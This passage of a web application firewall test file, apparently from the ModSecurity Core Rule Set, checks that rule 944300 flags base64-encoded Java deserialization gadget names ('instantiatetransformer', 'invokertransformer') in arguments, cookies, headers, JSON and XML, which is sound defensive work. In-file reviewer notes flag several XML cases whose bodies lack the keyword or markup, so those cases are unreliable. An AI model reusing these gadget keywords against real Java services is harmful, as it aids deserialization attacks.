          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-163
    desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-164
    desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg: unpadded base64 of
  # "instantiatetransformer". Same set of request locations as the group above.
  - test_title: 944300-165
    desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-166
    desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-167
    desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-168
    desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-169
    desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): desc names the keyword, but data is only "element_value", so the
  # request body carries no keyword; the XML markup looks lost from this copy.
  # Confirm the body against upstream before relying on this test.
  - test_title: 944300-170
    desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): Content-Type is application/xml but data is the bare keyword with
  # no XML elements around it; confirm the intended XML body.
  - test_title: 944300-171
    desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): data is identical to the non-nested case above (bare keyword, no
  # nesting visible); confirm the intended nested XML body.
  - test_title: 944300-172
    desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-173
    desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-174
    desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-175
    desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI: base64 text of "instantiatetransformer"
  # when one byte precedes it in the encoded stream.
  - test_title: 944300-176
    desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-177
    desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-178
    desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-179
    desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-180
    desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): desc names the keyword, but data is only "element_value", so the
  # request body carries no keyword; the XML markup looks lost from this copy.
  # Confirm the body against upstream before relying on this test.
  - test_title: 944300-181
    desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): Content-Type is application/xml but data is the bare keyword with
  # no XML elements around it; confirm the intended XML body.
  - test_title: 944300-182
    desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): data is identical to the non-nested case above (bare keyword, no
  # nesting visible); confirm the intended nested XML body.
  - test_title: 944300-183
    desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-184
    desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-185
    desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-186
    desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy: base64 text of "instantiatetransformer"
  # when two bytes precede it in the encoded stream.
  - test_title: 944300-187
    desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-188
    desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-189
    desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-190
    desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-191
    desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): desc names the keyword, but data is only "element_value", so the
  # request body carries no keyword; the XML markup looks lost from this copy.
  # Confirm the body against upstream before relying on this test.
  - test_title: 944300-192
    desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): Content-Type is application/xml but data is the bare keyword with
  # no XML elements around it; confirm the intended XML body.
  - test_title: 944300-193
    desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): data is identical to the non-nested case above (bare keyword, no
  # nesting visible); confirm the intended nested XML body.
  - test_title: 944300-194
    desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-195
    desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-196
    desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-197
    desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword aW52b2tlcnRyYW5zZm9ybWVy: base64 of "invokertransformer".
  - test_title: 944300-198
    desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=aW52b2tlcnRyYW5zZm9ybWVy"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-199
    desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
